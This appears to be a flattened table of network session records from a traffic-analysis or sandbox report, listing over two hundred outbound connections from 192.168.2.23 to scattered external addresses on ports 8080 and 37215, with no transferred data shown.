                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32946192.168.2.2337070188.169.60.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32947192.168.2.2345340137.25.94.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32948192.168.2.2355016187.93.117.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32949192.168.2.2336094160.192.155.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32950192.168.2.2357536208.128.171.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32951192.168.2.2352312148.214.31.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32952192.168.2.235315223.83.112.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32953192.168.2.2353130155.17.22.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32954192.168.2.2353448114.89.183.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32955192.168.2.235219257.201.87.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32956192.168.2.2335438197.164.145.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32957192.168.2.2334916185.205.86.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32958192.168.2.2347770169.29.18.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32959192.168.2.2338112104.41.73.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32960192.168.2.2358254142.39.204.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32961192.168.2.233903243.86.125.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32962192.168.2.2356142140.44.129.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32963192.168.2.2349844151.48.108.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32964192.168.2.2349242197.92.23.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32965192.168.2.2350690148.144.108.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32966192.168.2.2347028192.191.198.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32967192.168.2.2342128161.243.120.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32968192.168.2.2337128104.38.21.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32969192.168.2.236016460.42.58.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32970192.168.2.235834683.102.103.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32971192.168.2.235842857.46.228.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32972192.168.2.233756686.7.98.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32973192.168.2.2350174212.177.80.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32974192.168.2.234350692.92.135.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32975192.168.2.2339012146.19.8.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32976192.168.2.2360398138.198.104.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32977192.168.2.234315684.230.194.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32978192.168.2.233857675.31.193.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32979192.168.2.2352458110.84.11.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32980192.168.2.2338802122.245.108.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32981192.168.2.2347038155.155.106.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32982192.168.2.233488859.77.22.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32983192.168.2.234131251.104.139.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32984192.168.2.2358822109.41.96.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32985192.168.2.2338282163.54.129.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32986192.168.2.2346400184.131.3.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32987192.168.2.234999231.70.142.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32988192.168.2.2337074133.249.114.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32989192.168.2.2353604174.210.208.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32990192.168.2.2356490157.60.117.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32991192.168.2.234452696.119.242.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32992192.168.2.2337278151.231.121.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32993192.168.2.2342010131.133.0.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32994192.168.2.2335566130.175.101.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32995192.168.2.234956440.149.211.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32996192.168.2.2354494123.242.180.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32997192.168.2.234306867.75.42.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32998192.168.2.2358160122.174.88.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32999192.168.2.234199848.213.201.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33000192.168.2.2351968159.14.250.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33001192.168.2.233591275.240.8.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33002192.168.2.233920413.174.168.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33003192.168.2.2335536144.63.63.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33004192.168.2.2339786125.223.191.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33005192.168.2.2353602109.62.59.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33006192.168.2.2347326138.54.169.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33007192.168.2.23460462.126.62.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33008192.168.2.2360124144.179.167.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33009192.168.2.234346480.216.218.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33010192.168.2.2351938211.33.216.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33011192.168.2.23358324.158.237.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33012192.168.2.2351480204.33.104.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33013192.168.2.2340766181.57.217.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33014192.168.2.2341088103.74.119.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33015192.168.2.236062812.166.45.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33016192.168.2.2348434188.65.238.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33017192.168.2.2355514167.143.65.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33018192.168.2.2340834137.18.166.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33019192.168.2.2344092108.0.0.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33020192.168.2.234055471.235.255.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33021192.168.2.235797451.179.111.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33022192.168.2.235775464.63.131.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33023192.168.2.2334594223.116.247.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33024192.168.2.2350188184.22.31.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33025192.168.2.23371022.112.61.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33026192.168.2.234003489.239.19.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33027192.168.2.234232063.211.133.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33028192.168.2.2351584181.212.213.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33029192.168.2.2348466144.76.143.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33030192.168.2.2353310207.30.139.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33031192.168.2.2345936166.246.118.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33032192.168.2.2347268217.180.236.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33033192.168.2.23400529.185.54.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33034192.168.2.235072038.252.180.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33035192.168.2.23524605.175.33.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33036192.168.2.234942085.208.52.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33037192.168.2.2351836198.166.60.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33038192.168.2.2356928124.97.122.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33039192.168.2.2339760144.16.179.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33040192.168.2.2334406200.87.247.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33041192.168.2.2355226125.230.186.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33042192.168.2.233298880.70.59.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33043192.168.2.2358430157.215.206.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33044192.168.2.235356641.68.164.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33045192.168.2.235097441.24.177.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33046192.168.2.233338271.30.90.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33047192.168.2.234189241.83.200.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33048192.168.2.233986083.62.168.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33049192.168.2.2334176197.236.234.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33050192.168.2.2342434197.50.160.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33051192.168.2.2339504197.68.70.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33052192.168.2.2353044157.228.140.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33053192.168.2.233564075.64.183.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33054192.168.2.2354054157.251.102.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33055192.168.2.2333328105.162.116.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33056192.168.2.23561469.92.74.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33057192.168.2.233500441.137.219.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33058192.168.2.233505841.111.141.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33059192.168.2.233969651.161.239.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33060192.168.2.2359092197.146.215.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33061192.168.2.2351950157.218.58.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33062192.168.2.2342816157.72.122.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33063192.168.2.2353722197.105.140.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33064192.168.2.235751877.27.182.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33065192.168.2.2336154203.55.45.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33066192.168.2.2357182169.103.213.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33067192.168.2.2346548223.23.139.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33068192.168.2.2338158207.130.182.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33069192.168.2.234704241.144.77.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33070192.168.2.236022088.107.63.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33071192.168.2.2337588157.69.123.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33072192.168.2.236086854.188.5.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33073192.168.2.2341412197.140.161.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33074192.168.2.2348636157.31.52.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33075192.168.2.2343812197.102.31.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33076192.168.2.2358892190.138.42.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33077192.168.2.233463899.142.113.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33078192.168.2.2347272110.140.32.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33079192.168.2.2355418197.32.64.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33080192.168.2.233467041.54.24.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33081192.168.2.2357278197.133.206.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33082192.168.2.2339640212.31.36.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33083192.168.2.2355164157.196.11.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33084192.168.2.234848841.234.15.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33085192.168.2.2336136102.103.26.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33086192.168.2.2343474157.195.176.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33087192.168.2.2339994176.140.48.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33088192.168.2.236003041.64.146.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33089192.168.2.2336890196.220.137.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33090192.168.2.234836217.63.124.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33091192.168.2.233655041.142.232.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33092192.168.2.2357504157.175.116.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33093192.168.2.2333588101.82.219.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33094192.168.2.2349392157.103.121.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33095192.168.2.2338140197.177.165.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33096192.168.2.2333350133.81.13.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33097192.168.2.233498241.3.71.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33098192.168.2.2356524197.166.104.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33099192.168.2.2336508157.218.225.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33100192.168.2.2353458132.32.224.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33101192.168.2.2352816157.106.101.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33102192.168.2.234088041.73.196.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33103192.168.2.235394641.238.222.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33104192.168.2.2339570157.48.206.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33105192.168.2.234199841.6.18.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33106192.168.2.2341716173.236.105.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33107192.168.2.234199695.210.221.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33108192.168.2.2353842197.103.128.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33109192.168.2.2337334157.180.4.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33110192.168.2.235432441.44.153.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33111192.168.2.2339274104.114.248.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33112192.168.2.236073041.145.180.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33113192.168.2.234835041.37.156.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33114192.168.2.2353604157.221.28.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33115192.168.2.2350192197.231.55.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33116192.168.2.2352174179.51.47.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33117192.168.2.235476679.184.207.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33118192.168.2.2338352197.128.146.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33119192.168.2.2359904197.223.52.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33120192.168.2.233676241.184.238.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33121192.168.2.2357226197.26.16.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33122192.168.2.235923041.164.134.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33123192.168.2.233420041.238.255.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33124192.168.2.234177053.62.10.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33125192.168.2.235684483.240.150.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33126192.168.2.2359330117.60.145.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33127192.168.2.2360112157.84.37.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33128192.168.2.2354704157.156.226.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33129192.168.2.234930441.17.98.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33130192.168.2.2348928197.29.254.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33131192.168.2.2338088157.22.119.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33132192.168.2.2359096197.97.64.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33133192.168.2.2356184157.231.120.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33134192.168.2.235960641.216.255.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33135192.168.2.2351852108.45.198.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33136192.168.2.2339920197.224.166.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33137192.168.2.2345816197.239.102.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33138192.168.2.234592258.86.182.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33139192.168.2.233277841.9.25.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33140192.168.2.235942037.131.247.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33141192.168.2.233937041.99.234.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33142192.168.2.2354306197.243.155.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33143192.168.2.2342866157.22.224.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33144192.168.2.2346456157.251.229.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33145192.168.2.234573241.244.104.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33146192.168.2.2360098197.121.106.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33147192.168.2.234964031.244.3.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33148192.168.2.2338890101.153.154.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33149192.168.2.2355086157.31.164.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33150192.168.2.233537241.29.172.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33151192.168.2.2357856157.104.174.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33152192.168.2.2349420197.26.135.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33153192.168.2.235818439.106.166.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33154192.168.2.2335038197.231.204.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33155192.168.2.2349638197.255.188.23937215
